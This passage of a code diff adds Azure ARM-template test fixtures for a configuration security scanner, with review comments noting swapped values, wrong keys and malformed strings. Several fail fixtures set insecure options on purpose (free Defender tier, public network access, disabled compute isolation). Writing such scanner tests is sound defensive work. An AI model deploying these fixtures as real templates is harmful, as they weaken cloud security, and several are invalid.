+ "resources": [
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2020-01-01",
+ "name": "SqlServerVirtualMachines",
+ "properties": {
+ "tier": "Standard"
+ }
+ }
+ ],
+ "outputs": {
+ "defenderResourceId": {
+ "type": "string",
+ "value": "[resourceId('Microsoft.Security/autoProvisioningSettings', parameters('defenderName'))]"
+ }
+ }
+}
\ No newline at end of file
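Review bot: The SqlServersVMS fail fixture sets `"tier": "Standard"` while pass.json in the next hunk sets `"tier": "Free"`, the opposite of how every other Defender fixture on this page is arranged (fail = Free, pass = Standard); unless the check for SqlServerVirtualMachines is intentionally inverted, the two values look swapped. Both files also use the key `tier` where the sibling `Microsoft.Security/pricings` fixtures use `pricingTier`, so if the check evaluates `properties.pricingTier`, neither fixture contains the property and the pass/fail outcome is decided by the missing-key path rather than by the value; `"pricingTier": "Free"` in fail.json and `"pricingTier": "Standard"` in pass.json would make the test exercise the comparison it is named for. Both fixtures additionally reference `parameters('defenderName')` in `outputs` without declaring it, which the parser tolerates but which is not a deployable template.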
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/pass.json
new file mode 100644
index 00000000000..a4c00996450
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/pass.json
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2020-01-01",
+ "name": "SqlServerVirtualMachines",
+ "properties": {
+ "tier": "Free"
+ }
+ }
+ ],
+ "outputs": {
+ "defenderResourceId": {
+ "type": "string",
+ "value": "[resourceId('Microsoft.Security/autoProvisioningSettings', parameters('defenderName'))]"
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json
new file mode 100644
index 00000000000..d75a866210a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2018-06-01",
+ "name": "fail",
+ "properties": {
+ "pricingTier": "Free",
+ "resourceType": "Microsoft.Security/pricings"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json
new file mode 100644
index 00000000000..e7cf4f13566
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Security/pricings",
+ "apiVersion": "2018-06-01",
+ "name": "pass",
+ "properties": {
+ "pricingTier": "Standard",
+ "resourceType": "Microsoft.Security/pricings"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json
new file mode 100644
index 00000000000..b8c2eaf5e5c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "fail1",
+ "location": "West US",
+ "properties": {
+ "managedNetwork": {
+ "outboundRules": {
+ "rule1": {
+ "type": "ServiceTag"
+ }
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json
new file mode 100644
index 00000000000..ce16d6b2fdd
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json
@@ -0,0 +1,16 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.MachineLearningServices/workspaces",
+ "apiVersion": "2022-12-01",
+ "name": "fail2",
+ "location": "West US",
+ "properties": {
+ "description": "No networks"
+
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json new file mode 100644 index 00000000000..c994b877deb --- /dev/null +++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "pass1", + "location": "West US", + "properties": { + "managedNetwork": { + "outboundRules": { + "rule1": { + "type": "PrivateEndpoint" + } + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json new file mode 100644 index 00000000000..babc0287faf --- /dev/null +++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "pass2", + "location": "West US", + "properties": { + "managedNetwork": { + "outboundRules": { + "rule1": { + "type": "ServiceTag" + }, + "rule2": { + "type": "PrivateEndpoint" + } + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail.json b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail.json new file mode 100644 index 00000000000..3f8e6849fd4 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail.json 
@@ -0,0 +1,17 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Search/searchServices", + "apiVersion": "2020-08-01-Preview", + "name": "fail", + "sku": { + "name": "standard" + }, + "properties": { + "publicNetworkAccess": "Enabled" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail2.json b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail2.json new file mode 100644 index 00000000000..791f340331b --- /dev/null +++ b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail2.json @@ -0,0 +1,17 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Search/searchServices", + "apiVersion": "2020-08-01", + "name": "fail2", + "sku": { + "name": "standard" + }, + "properties": { + "replicaCount": 2 + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureSearchSLAIndex/pass.json b/tests/arm/checks/resource/example_AzureSearchSLAIndex/pass.json new file mode 100644 index 00000000000..97efe485f93 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureSearchSLAIndex/pass.json @@ -0,0 +1,19 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Search/searchServices", + "apiVersion": "2024-03-01-preview", + "name": "pass", + "location": "string", + "sku": { + "name": "standard" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "replicaCount": 3 + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail.json b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail.json new file mode 100644 index 00000000000..9e52cf063b8 
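Review bot: AzureSearchSLAIndex/fail.json mixes an unrelated setting (`"publicNetworkAccess": "Enabled"`) into a fixture whose failure is caused by the absent `replicaCount`, and pass.json flips that same setting to `Disabled` while adding `replicaCount`; from the pair a reader cannot tell whether the check reads `publicNetworkAccess` at all. Keep pass and fail identical except for the property under test: drop `publicNetworkAccess` from all three files and leave `replicaCount` absent in fail.json. The AzureSearchSLAQueryUpdates fixtures on the next line repeat the same pattern.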
--- /dev/null +++ b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Search/searchServices", + "apiVersion": "2024-03-01-preview", + "name": "fail", + "location": "string", + "sku": { + "name": "standard" + }, + "properties": { + "publicNetworkAccess": "Enabled" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail2.json b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail2.json new file mode 100644 index 00000000000..528a8fd2e36 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail2.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Search/searchServices", + "apiVersion": "2024-03-01-preview", + "name": "fail2", + "location": "string", + "sku": { + "name": "standard" + }, + "properties": { + "replicaCount": 1 + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/pass.json b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/pass.json new file mode 100644 index 00000000000..378feee1584 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/pass.json @@ -0,0 +1,19 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Search/searchServices", + "apiVersion": "2024-03-01-preview", + "name": "pass", + "location": "string", + "sku": { + "name": "standard" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "replicaCount": 2 + } + } + ] +} \ No newline at end of file 
diff --git a/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail.json b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail.json
new file mode 100644
index 00000000000..51b1f2776ac
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail.json
@@ -0,0 +1,145 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ServiceFabric/clusters", + "apiVersion": "2019-03-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "properties": { + "addOnFeatures": [ "string" ], + "azureActiveDirectory": { + "clientApplication": "string", + "clusterApplication": "string", + "tenantId": "string" + }, + "certificate": { + "thumbprint": "string", + "thumbprintSecondary": "string", + "x509StoreName": "string" + }, + "certificateCommonNames": { + "commonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string" + } + ], + "x509StoreName": "string" + }, + "clientCertificateCommonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string", + "isAdmin": "bool" + } + ], + "clientCertificateThumbprints": [ + { + "certificateThumbprint": "string", + "isAdmin": "bool" + } + ], + "clusterCodeVersion": "string", + "diagnosticsStorageAccountConfig": { + "blobEndpoint": "string", + "protectedAccountKeyName": "string", + "queueEndpoint": "string", + "storageAccountName": "string", + "tableEndpoint": "string" + }, + "eventStoreServiceEnabled": "bool", + "managementEndpoint": "string", + "nodeTypes": [ + { + "applicationPorts": { + "endPort": "int", + "startPort": "int" + }, + "capacities": { + "{customized property}": "string" + }, + "clientConnectionEndpointPort": "int", + "durabilityLevel": "string", + "ephemeralPorts": { + "endPort": "int", + "startPort": "int" + }, + "httpGatewayEndpointPort": "int", + "isPrimary": "bool", + "name": "string", + "placementProperties": { + "{customized property}": "string" + }, + "reverseProxyEndpointPort": "int", + "vmInstanceCount": "int" + } + ], + "reliabilityLevel": "string", + "reverseProxyCertificate": { + "thumbprint": "string", + 
"thumbprintSecondary": "string", + "x509StoreName": "string" + }, + "reverseProxyCertificateCommonNames": { + "commonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string" + } + ], + "x509StoreName": "string" + }, + "upgradeDescription": { + "deltaHealthPolicy": { + "applicationDeltaHealthPolicies": { + "{customized property}": { + "defaultServiceTypeDeltaHealthPolicy": { + "maxPercentDeltaUnhealthyServices": "int" + }, + "serviceTypeDeltaHealthPolicies": { + "{customized property}": { + "maxPercentDeltaUnhealthyServices": "int" + } + } + } + }, + "maxPercentDeltaUnhealthyApplications": "int", + "maxPercentDeltaUnhealthyNodes": "int", + "maxPercentUpgradeDomainDeltaUnhealthyNodes": "int" + }, + "forceRestart": "bool", + "healthCheckRetryTimeout": "string", + "healthCheckStableDuration": "string", + "healthCheckWaitDuration": "string", + "healthPolicy": { + "applicationHealthPolicies": { + "{customized property}": { + "defaultServiceTypeHealthPolicy": { + "maxPercentUnhealthyServices": "int" + }, + "serviceTypeHealthPolicies": { + "{customized property}": { + "maxPercentUnhealthyServices": "int" + } + } + } + }, + "maxPercentUnhealthyApplications": "int", + "maxPercentUnhealthyNodes": "int" + }, + "upgradeDomainTimeout": "string", + "upgradeReplicaSetCheckTimeout": "string", + "upgradeTimeout": "string" + }, + "upgradeMode": "string", + "vmImage": "string" + } +} + ] +} diff --git a/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail2.json b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail2.json new file mode 100644 index 00000000000..5fb9508623f --- /dev/null +++ b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail2.json 
@@ -0,0 +1,156 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ServiceFabric/clusters", + "apiVersion": "2019-03-01", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "properties": { + "addOnFeatures": [ "string" ], + "azureActiveDirectory": { + "clientApplication": "string", + "clusterApplication": "string", + "tenantId": "string" + }, + "certificate": { + "thumbprint": "string", + "thumbprintSecondary": "string", + "x509StoreName": "string" + }, + "certificateCommonNames": { + "commonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string" + } + ], + "x509StoreName": "string" + }, + "clientCertificateCommonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string", + "isAdmin": "bool" + } + ], + "clientCertificateThumbprints": [ + { + "certificateThumbprint": "string", + "isAdmin": "bool" + } + ], + "clusterCodeVersion": "string", + "diagnosticsStorageAccountConfig": { + "blobEndpoint": "string", + "protectedAccountKeyName": "string", + "queueEndpoint": "string", + "storageAccountName": "string", + "tableEndpoint": "string" + }, + "eventStoreServiceEnabled": "bool", + "fabricSettings": [ + { + "name": "Security", + "parameters": [ + { + "name": "ClusterProtectionLevel", + "value": "sign" + } + ] + } + ], + "managementEndpoint": "string", + "nodeTypes": [ + { + "applicationPorts": { + "endPort": "int", + "startPort": "int" + }, + "capacities": { + "{customized property}": "string" + }, + "clientConnectionEndpointPort": "int", + "durabilityLevel": "string", + "ephemeralPorts": { + "endPort": "int", + "startPort": "int" + }, + "httpGatewayEndpointPort": "int", + "isPrimary": "bool", + "name": "string", + "placementProperties": { + "{customized property}": "string" + }, + "reverseProxyEndpointPort": "int", + 
"vmInstanceCount": "int" + } + ], + "reliabilityLevel": "string", + "reverseProxyCertificate": { + "thumbprint": "string", + "thumbprintSecondary": "string", + "x509StoreName": "string" + }, + "reverseProxyCertificateCommonNames": { + "commonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string" + } + ], + "x509StoreName": "string" + }, + "upgradeDescription": { + "deltaHealthPolicy": { + "applicationDeltaHealthPolicies": { + "{customized property}": { + "defaultServiceTypeDeltaHealthPolicy": { + "maxPercentDeltaUnhealthyServices": "int" + }, + "serviceTypeDeltaHealthPolicies": { + "{customized property}": { + "maxPercentDeltaUnhealthyServices": "int" + } + } + } + }, + "maxPercentDeltaUnhealthyApplications": "int", + "maxPercentDeltaUnhealthyNodes": "int", + "maxPercentUpgradeDomainDeltaUnhealthyNodes": "int" + }, + "forceRestart": "bool", + "healthCheckRetryTimeout": "string", + "healthCheckStableDuration": "string", + "healthCheckWaitDuration": "string", + "healthPolicy": { + "applicationHealthPolicies": { + "{customized property}": { + "defaultServiceTypeHealthPolicy": { + "maxPercentUnhealthyServices": "int" + }, + "serviceTypeHealthPolicies": { + "{customized property}": { + "maxPercentUnhealthyServices": "int" + } + } + } + }, + "maxPercentUnhealthyApplications": "int", + "maxPercentUnhealthyNodes": "int" + }, + "upgradeDomainTimeout": "string", + "upgradeReplicaSetCheckTimeout": "string", + "upgradeTimeout": "string" + }, + "upgradeMode": "string", + "vmImage": "string" + } +} + ] +} diff --git a/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/pass.json b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/pass.json new file mode 100644 index 00000000000..6e77f60ac08 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/pass.json 
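Review bot: fail2.json uses `"value": "sign"` for the `ClusterProtectionLevel` parameter, but the values the platform accepts are `None`, `Sign` and `EncryptAndSign`; lowercase `sign` is a value a deployment would reject rather than the real insecure setting, so if the check compares exact strings this fixture proves less than it appears to. I'd set `"value": "Sign"` and add a sibling fixture with `"value": "None"`, the explicit unprotected level. This hunk starts on the previous line; the enclosing resource is otherwise unchanged.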
@@ -0,0 +1,158 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.ServiceFabric/clusters", + "apiVersion": "2019-03-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "properties": { + "addOnFeatures": [ "string" ], + "azureActiveDirectory": { + "clientApplication": "string", + "clusterApplication": "string", + "tenantId": "string" + }, + "certificate": { + "thumbprint": "string", + "thumbprintSecondary": "string", + "x509StoreName": "string" + }, + "certificateCommonNames": { + "commonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string" + } + ], + "x509StoreName": "string" + }, + "clientCertificateCommonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string", + "isAdmin": "bool" + } + ], + "clientCertificateThumbprints": [ + { + "certificateThumbprint": "string", + "isAdmin": "bool" + } + ], + "clusterCodeVersion": "string", + "diagnosticsStorageAccountConfig": { + "blobEndpoint": "string", + "protectedAccountKeyName": "string", + "queueEndpoint": "string", + "storageAccountName": "string", + "tableEndpoint": "string" + }, + "eventStoreServiceEnabled": "bool", + + "fabricSettings": [ + { + "name": "Security", + "parameters": [ + { + "name": "ClusterProtectionLevel", + "value": "EncryptAndSign" + + } + ] + } + ], + "managementEndpoint": "string", + "nodeTypes": [ + { + "applicationPorts": { + "endPort": "int", + "startPort": "int" + }, + "capacities": { + "{customized property}": "string" + }, + "clientConnectionEndpointPort": "int", + "durabilityLevel": "string", + "ephemeralPorts": { + "endPort": "int", + "startPort": "int" + }, + "httpGatewayEndpointPort": "int", + "isPrimary": "bool", + "name": "string", + "placementProperties": { + "{customized property}": "string" + }, + 
"reverseProxyEndpointPort": "int", + "vmInstanceCount": "int" + } + ], + "reliabilityLevel": "string", + "reverseProxyCertificate": { + "thumbprint": "string", + "thumbprintSecondary": "string", + "x509StoreName": "string" + }, + "reverseProxyCertificateCommonNames": { + "commonNames": [ + { + "certificateCommonName": "string", + "certificateIssuerThumbprint": "string" + } + ], + "x509StoreName": "string" + }, + "upgradeDescription": { + "deltaHealthPolicy": { + "applicationDeltaHealthPolicies": { + "{customized property}": { + "defaultServiceTypeDeltaHealthPolicy": { + "maxPercentDeltaUnhealthyServices": "int" + }, + "serviceTypeDeltaHealthPolicies": { + "{customized property}": { + "maxPercentDeltaUnhealthyServices": "int" + } + } + } + }, + "maxPercentDeltaUnhealthyApplications": "int", + "maxPercentDeltaUnhealthyNodes": "int", + "maxPercentUpgradeDomainDeltaUnhealthyNodes": "int" + }, + "forceRestart": "bool", + "healthCheckRetryTimeout": "string", + "healthCheckStableDuration": "string", + "healthCheckWaitDuration": "string", + "healthPolicy": { + "applicationHealthPolicies": { + "{customized property}": { + "defaultServiceTypeHealthPolicy": { + "maxPercentUnhealthyServices": "int" + }, + "serviceTypeHealthPolicies": { + "{customized property}": { + "maxPercentUnhealthyServices": "int" + } + } + } + }, + "maxPercentUnhealthyApplications": "int", + "maxPercentUnhealthyNodes": "int" + }, + "upgradeDomainTimeout": "string", + "upgradeReplicaSetCheckTimeout": "string", + "upgradeTimeout": "string" + }, + "upgradeMode": "string", + "vmImage": "string" + } +} + ] +} diff --git a/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail1.json b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail1.json new file mode 100644 index 00000000000..fad70cb1247 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail1.json 
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces/bigDataPools",
+ "apiVersion": "2021-02-01",
+ "name": "fail1",
+ "location": "East US",
+ "properties": {
+ "isComputeIsolationEnabled": false,
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail2.json b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail2.json
new file mode 100644
index 00000000000..c196f5b0ba3
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail2.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces/bigDataPools",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "location": "East US",
+ "properties": {
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ }
+ }
+ ]
+}
+
diff --git a/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/pass.json b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/pass.json
new file mode 100644
index 00000000000..38ab33f7f20
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/pass.json
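Review bot: `storageAccountAccessKey`, `storageContainerPath` and `storageContainerSasKey` are not properties of `Microsoft.Synapse/workspaces/bigDataPools`; they appear to be copied from the vulnerabilityAssessments fixture, where they do belong. Besides being noise next to the one property under test, key-named fields in fixtures tend to attract secret-scanner findings even with placeholder values. Drop them from fail1.json, fail2.json and pass.json (next line); the same copy-paste appears in the AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached fixtures further down.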
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces/bigDataPools",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "East US",
+ "properties": {
+ "isComputeIsolationEnabled": true,
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail1.json b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail1.json
new file mode 100644
index 00000000000..bec39a37b7c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail1.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces/vulnerabilityAssessments",
+ "apiVersion": "2021-02-01",
+ "name": "fail1",
+ "location": "East US",
+ "properties": {
+ "recurringScans": {
+ "emails": [
+ "string"
+ ],
+ "emailSubscriptionAdmins": true,
+ "isEnabled": false
+ },
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail2.json b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail2.json
new file mode 100644
index 00000000000..f3ae3619f04
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/fail2.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces/vulnerabilityAssessments",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "location": "East US",
+ "properties": {
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ }
+ }
+ ]
+}
+
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/pass.json b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/pass.json
new file mode 100644
index 00000000000..fb6fffcfe7a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspaceVAisEnabled/pass.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces/vulnerabilityAssessments",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "East US",
+ "properties": {
+ "recurringScans": {
+ "emails": [
+ "string"
+ ],
+ "emailSubscriptionAdmins": true,
+ "isEnabled": true
+ },
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/fail.json b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/fail.json
new file mode 100644
index 00000000000..22d637ad9bb
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/fail.json
@@ -0,0 +1,21 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "location": "East US",
+ "properties": {
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', 'test'))]",
+ "[resourceId('Microsoft.Synapse/workspaces/firewallRules', 'test'))]"
+ ]
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass.json b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass.json
new file mode 100644
index 00000000000..a8162cdac6f
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass.json
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Synapse/workspaces",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "East US",
+ "properties": {
+ "storageAccountAccessKey": "string",
+ "storageContainerPath": "string",
+ "storageContainerSasKey": "string"
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', 'test'))]"
+ ]
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass2.json b/tests/arm/checks/resource/example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached/pass2.json
new file mode 100644
index 00000000000..6916abd631b
--- /dev/null
